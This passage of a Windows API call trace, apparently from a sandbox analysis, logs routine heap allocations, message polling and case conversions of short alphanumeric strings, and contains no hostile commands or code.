(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.465] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.465] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.465] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.467] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.467] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.467] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.467] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.468] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.468] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.468] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.470] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.470] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0256.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.471] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.471] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.472] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.472] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.472] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3573c60 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, 